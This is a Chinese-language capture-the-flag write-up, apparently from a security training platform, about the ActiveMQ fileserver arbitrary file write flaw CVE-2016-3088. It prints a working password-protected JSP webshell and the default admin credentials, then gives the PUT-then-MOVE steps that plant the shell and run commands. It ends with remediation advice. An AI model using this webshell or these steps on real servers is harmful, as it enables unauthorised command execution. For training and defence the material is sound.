ActiveMQ任意文件写入漏洞分析溯源

墨者学院

WEB安全

ActiveMQ任意文件写入漏洞分析溯源

ActiveMQ 简介

ActiveMQ 是 Apache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器，它为基于 Java
的 web 容器，例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0
及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用

fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：

1. 其使用率并不高
2. 文件操作容易出现漏洞

漏洞复现

1. 访问url

   

2. 查找漏洞

   搜索发现存在CVE-2016-3088 漏洞，找到分析查看漏洞原因

   查询发现在ActiveMQ<5.12.x版本存在fileserver 应用，可以通过fileserver写入文件（不解析jsp文件）通过移动到任意位置，就可以造成任意文件写入漏洞。

   文件写入的几种利用方式

   1 写入webshell

   2 写入 cron 或 ssh key

   3 写入 jar 或 jetty.xml 等库和配置文件

   写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问，所以有点鸡肋；写入cron或ssh
   key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；写入jar，稍微麻烦点（需要jar的后门），写入xml配置文件，这个方法比较靠谱，但有个鸡肋点是：我们需要知道activemq的绝对路径。

3. 漏洞利用

   尝试写入jsp

   有回显带密码验证的
   <% 
       if("023".equals(request.getParameter("pwd"))){
           java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
           int a = -1;
           byte[] b = new byte[2048];
           out.print("<pre>");
           while((a=in.read(b))!=-1){
               out.println(new String(b));
           }
           out.print("</pre>");
       }
   %>
   请求url：http://ip:port/Shell/cmd2.jsp?pwd=023&i=ls
   

   通过burp访问，发现需要验证，需要登录，我们尝试登录，默认的ActiveMQ的账号和密码均为admin

   

   登录后查看http方法 ，发现没有put方法

   

   执行put方法 发现却上传成功了

   

   接下来通过move移动到admin或api下，就可以解析jsp文件了， 查找他的绝对路径

   访问url：http://ip:port/admin/test/systemProperties.jsp

   

   通过move方法将jsp木马移动到admin或api下，进行解析

   

   然后访问，可以执行命令，

   

   这里就可以直接查看flag，但是找了半天没找到,最后在根目录找到了flag

   

解决方案

1. ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。
2. 通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能

参考链接

jsp一句话

ActiveMQ任意文件写入漏洞